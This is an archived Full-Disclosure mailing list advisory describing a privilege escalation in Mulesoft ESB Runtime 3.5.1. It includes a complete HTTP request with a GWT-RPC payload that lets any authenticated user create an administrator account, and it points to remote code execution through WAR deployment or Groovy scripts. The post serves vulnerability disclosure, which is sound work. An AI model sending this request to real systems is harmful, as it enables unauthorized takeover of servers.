| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <CAOJKFBCsKSo-uBP-7oft41ZkKymWQUdKaWABO1_ZOXOeR2KZsw@mail.gmail.com> Date: Tue, 21 Oct 2014 12:06:55 -0500 From: Brandon Perry <bperry.volatile@...il.com> To: "fulldisclosure@...lists.org" <fulldisclosure@...lists.org> Subject: [FD] Mulesoft ESB Authenticated Privilege Escalation Mulesoft ESB Runtime 3.5.1 Authenticated Privilege Escalation → Remote Code Execution Mulesoft ESB Runtime 3.5.1 allows any arbitrary authenticated user to create an administrator user due to a lack of permissions check in the handler/securityService.rpc endpoint. The following HTTP request can be made by any authenticated user, even those with a single role of Monitor. POST /mmc-3.5.1/handler/securityService.rpc HTTP/1.1 Host: 192.168.0.22:8585 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:31.0) Gecko/20100101 Firefox/31.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: text/x-gwt-rpc; charset=utf-8/ Referer: http://192.168.0.22:8585/mmc-3.5.1/index.jsp Content-Length: 503 Cookie: JSESSIONID=CEB49ED5E239CB7AB6B7C02DD83170A4; Connection: keep-alive Pragma: no-cache Cache-Control: no-cache 7|0|15|http://192.168.0.22:8585/mmc-3.5.1/com.mulesoft.mmc.MMC/ |5192695B02944BAAB195B91AB3FDDA48|org.mule.galaxy.web.rpc.RemoteSecurityService|addUser|org.mule.galaxy.web.rpc.WUser/4112688705|java.lang.String/2004016611| fdsafdsa@...afdsa.com |java.util.ArrayList/4159755760|298e8098-ff3e-4d13-b37e-3f3d33193ed9|ed4cbe90-085d-4d44-976c-436eb1d78d16|ccd8aee7-30bb-42e1-8218-cfd9261c7af9|d63c1710-e811-4c3c-aeb6-e474742ac084|fdsa|notadmin|notpassword|1|2|3|4|2|5|6|5|7|8|4|6|9|6|10|6|11|6|12|0|13|0|0|14|15| This request will create an administrator with all roles with a username of notadmin and a password of notpassword. Many vectors of remote code execution are available to an administrator. Not only can an administrator deploy WAR applications, they can also evaluate arbitrary groovy scripts via the web interface. -- http://volatile-minds.blogspot.com -- blog http://www.volatileminds.net -- website _______________________________________________ Sent through the Full Disclosure mailing list http://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists